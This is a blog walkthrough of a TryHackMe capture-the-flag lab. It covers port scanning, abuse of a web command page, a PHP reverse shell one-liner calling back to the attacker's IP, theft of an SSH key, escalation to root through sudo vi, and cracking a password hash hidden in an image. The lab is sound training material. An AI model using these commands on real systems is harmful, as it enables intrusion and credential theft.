The skills to be tested and needed to solve this room are: port scanning, fuzzing, steganography, privelege escalation, reverse shell.
This room was released on 1/17/2021 and it is rated easy in difficulty. Shout-out to the room creators, @0x9747, @saharshtapi and @AndyInfoSec. You can access the room at https://tryhackme.com/room/chocolatefactory.
I was assigned a target IP address of 10.10.132.139. You will be assigned a different IP address, so double check your entries when following this walk-through.
The requirements to complete this room are:
- Enter the key you found:
- What is Charlie’s password?
- Change user to charlie
- No answer needed
- Enter the user flag:
- Enter the root flag:
- Scan the target using nmap. Type nmap -sC -sV -p- -oN nmap/chocolatefactory 10.10.132.139
- -sC – to scan using the default nmap scripts
- -sV – to pull version information of open ports found during the scan
- -oN – to save the results of the scan to a file named “chocolatefactory” and saved inside the nmap directory
- -p- – to scan all ports
* * There are more ports listed in the nmap scan but these three ports are what we are going to use to continue with the hack.
2. Check the web service by opening your choice of web browser and enter the IP address. Type 10.10.132.139
**Lesson learned** When I saw the log in form, I immediately started firing sqlmap and then use BurpSuite to capture the request and response between the client and server. I should have enumerated the web server for hidden directories and files, which I did in the next step.
3. Enumerate the web server using gobuster. Type gobuster dir -u 10.10.132.139 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- dir – to use directory/file brute-forcing mode
- -u – is the flag to tell gobuster that we are scanning a URL
- -w – is the flag to set the list of possible directory and file names
**I was not getting any results, and when I tried to login to the login page with bogus credentials, I noticed that the page is in php.
4. Tried gobuster again and this time I used the -x option to limit my enumeration to php and txt extensions. Type gobuster dir -u http://10.10.132.139 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
5. Visit the page using your choice of web browser. Type http://10.10.132.139/h***.php
**Looks like a page where we can execute commands
6. Tried to execute cat /etc/passwd
**We saw that there is a username charlie
7. Let’s see if we can trigger a reverse shell through this command execution page. But first, we have to start a netcat listener from our Kali machine. Type nc -nlvp 1234 (You can choose a port number of your own, I chose 1234)
8. I searched for a one-liner php reverse shell, and found one from this page. Type php -r ‘$sock=fsockopen(“10.13.3.31”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’ then hit Enter and check your netcat listener if there is a shell. Make sure to enter your Kali machine’s VPN IP address which is normally the Tun0 adapter and also match the port number that you used in your netcat listener.
9. Once I hit execute from the command execution page, I got a shell on my netcat listener.
10. Upgraded the shell to a more stable one, type python -c ‘import pty;pty.spawn(“/bin/bash”)’
**In step 9 one of the files inside the html directory is called k**_***_*** and the first question we have to answer to compete this room is about a key. Type cat k**_***-***
- Enter the key you found
**Navigated to the /home/charlie directory and I don’t have permission to read user.txt
11. Time to escalate our privilege. Enumerated user Charlie’s home directory and found two interesting files: t******* and t*******.pub. When there are two files of the same name and one has a .pub extension, that tells me that these are SSH private and public keys.
**What makes the discovery of the SSH Private key worse, is that it doesn’t have a passphrase setup. Meaning we can just use the private key to login as user charlie.
12. Download the SSH private key to your Kali machine then connect using SSH as user charlie. Type ssh -i <private key> firstname.lastname@example.org
**Now, we are logged in as user charlie
13. Retrieve the user.txt. Type cat user.txt
14. Now, let’s see what sudo privileges does user charlie has. Type sudo -l
**Looks like we don’t need a password to use vi with sudo privileges
15. I researched for a way to use vi for privilege escalation and I came across this post, if you scroll down, he explained how to escalate privilege using vim. Type sudo vi -c ‘!bash’ and hit Enter.
**As you can see, we are now user root.
16. Visiting root’s home directory, we don’t see any file like “root.txt”, there is one file which looks like a python script
17. Running the script results to a prompt asking for a key.
18. Use the key that you found in the first task:
**We found the root flag, but there is still one task left, what is Charlie’s password. I kind of struggled on this one because I was being impatient. I cracked the hash of Charlie’s password found in the /etc/shadow, but the password that was showing up was only 4 characters and the answer to Charlie’s password is made out of 6 characters. I started just guessing using character names from the movie “Charlie and the Chocolate Factory” and used names that were 6 characters. No luck. I looked at the room again and noticed that steganography is expected from this room, but I haven’t found an image yet.
**I noticed that in the /var directory there is a /ftp directory, and inside is an image called gum_room.jpg.
19. Downloaded the image to my Kali, and used stegseek to crack the password and extract hidden data that could possibly be in the image. Type stegseek gum_room.jpg /usr/share/wordlists/rockyou.txt
20. Let’s look at what was extracted from the image
**The content looks like a base64 encoded message.
21. Let’s plug this in to CyberChef and see what the message is.
**It is a /etc/shadow file, and when I compared it to the one found in our victim machine, Charlie’s hashed password is different from the one above.
22. Let’s use hashcat to crack this sha512crypt hashed password. Type (I am using my how Windows machine to use hashcat) .\hashcat.exe -m 1800 -a 0 .\crack.txt .\rockyou.txt
**And we got the answer to Charlie’s password.
I hope you enjoyed this write-up, and please don’t forget to subscribe to my blog.